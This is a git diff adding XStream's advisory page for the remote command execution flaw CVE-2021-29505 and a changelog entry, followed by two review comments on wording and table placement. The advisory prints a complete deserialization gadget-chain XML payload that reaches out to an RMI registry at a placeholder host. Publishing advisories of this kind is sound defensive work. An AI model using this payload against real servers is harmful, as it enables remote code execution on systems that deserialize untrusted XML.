diff --git a/xstream-distribution/src/content/CVE-2021-29505.html b/xstream-distribution/src/content/CVE-2021-29505.html new file mode 100644 index 000000000..378eab8b6 --- /dev/null +++ b/xstream-distribution/src/content/CVE-2021-29505.html @@ -0,0 +1,119 @@ + + +
+CVE-2021-29505: XStream is vulnerable to a Remote Command Execution attack.
+ +All versions until and including version 1.4.16 are affected, if using the version out of the box. No user is + affected, who followed the recommendation to setup XStream's security + framework with a whitelist limited to the minimal required types.
+ +The processed stream at unmarshalling time contains type information to recreate the formerly written objects. + XStream creates therefore new instances based on these type information. An attacker can manipulate the processed + input stream and replace or inject objects, that result in execution of a local command on the server.
+ +Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and + unmarshal it again with XStream:
+<java.util.PriorityQueue serialization='custom'> + <unserializable-parents/> + <java.util.PriorityQueue> + <default> + <size>2</size> + </default> + <int>3</int> + <javax.naming.ldap.Rdn_-RdnEntry> + <type>12345</type> + <value class='com.sun.org.apache.xpath.internal.objects.XString'> + <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: <none></m__obj> + </value> + </javax.naming.ldap.Rdn_-RdnEntry> + <javax.naming.ldap.Rdn_-RdnEntry> + <type>12345</type> + <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'> + <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'> + <parsedMessage>true</parsedMessage> + <soapVersion>SOAP_11</soapVersion> + <bodyParts/> + <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'> + <attachmentsInitialized>false</attachmentsInitialized> + <multiPart class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'> + <soapPart/> + <mm> + <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'> + <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'> + <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'> + <names> + <string>aa</string> + <string>aa</string> + </names> + <ctx> + <environment/> + <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'> + <java.rmi.server.RemoteObject> + <string>UnicastRef</string> + <string>ip2</string> + <int>1099</int> + <long>0</long> + <int>0</int> + <short>0</short> + <boolean>false</boolean> + </java.rmi.server.RemoteObject> + </registry> + <host>ip2</host> + <port>1099</port> + </ctx> + </candidates> + </aliases> + </it> + </mm> + </multiPart> + </sm> + </message> + </value> + </javax.naming.ldap.Rdn_-RdnEntry> + </java.util.PriorityQueue> +</java.util.PriorityQueue> +
XStream xstream = new XStream(); +xstream.fromXML(xml); +
As soon as the XML gets unmarshalled, the payload gets executed and the command is executed on the host.
+ +Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.
+ +The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by + manipulating the processed input stream.
+ +See workarounds for the different versions covering all CVEs.
+ +V3geB1rd, white hat hacker from Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it.
+ + + diff --git a/xstream-distribution/src/content/changes.html b/xstream-distribution/src/content/changes.html index 19a8e2172..4cfe0f5a2 100644 --- a/xstream-distribution/src/content/changes.html +++ b/xstream-distribution/src/content/changes.html @@ -101,11 +101,26 @@This maintenance release addresses the security vulnerability + CVE-2021-29505, when unmarshalling with XStream instances using an uninitialized + security framework.
+ +CVE | Description | |
---|---|---|
Version 1.4.16 | ++ | + |
CVE-2021-29505 | +XStream is vulnerable to a Remote Command Execution attack. | +|
Version 1.4.15 | @@ -393,8 +402,11 @@ |
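Review bot: In the new CVE-2021-29505.html, the impact paragraph ("The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream.") is ungrammatical and reads as if the attacker needs rights; rephrase to "The vulnerability may allow a remote attacker to execute commands on the host solely by manipulating the processed input stream." The same hunk has two smaller wording issues worth fixing before release: "No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types." should be "No user who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types is affected.", and "Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON." should become one sentence ("... for any supported format, e.g. JSON."). The affected-versions paragraph names 1.4.16 as the last affected release but never states the release that contains the fix; since this page is what operators will read when triaging, add the fixed version explicitly alongside the existing whitelist advice.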
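Review bot: In the changes.html hunk, the new CVE-2021-29505 row is inserted under the "Version 1.4.16" heading of the vulnerabilities table, but the CVE page added in the same commit states that all versions up to and including 1.4.16 are affected; the row should sit under the release that ships the fix, not under an affected version, or readers will conclude 1.4.16 is already safe. Relatedly, the new paragraph "This maintenance release addresses the security vulnerability CVE-2021-29505, when unmarshalling with XStream instances using an uninitialized security framework." does not name the maintenance release version; add it so the paragraph and the table row agree on which version closes the issue.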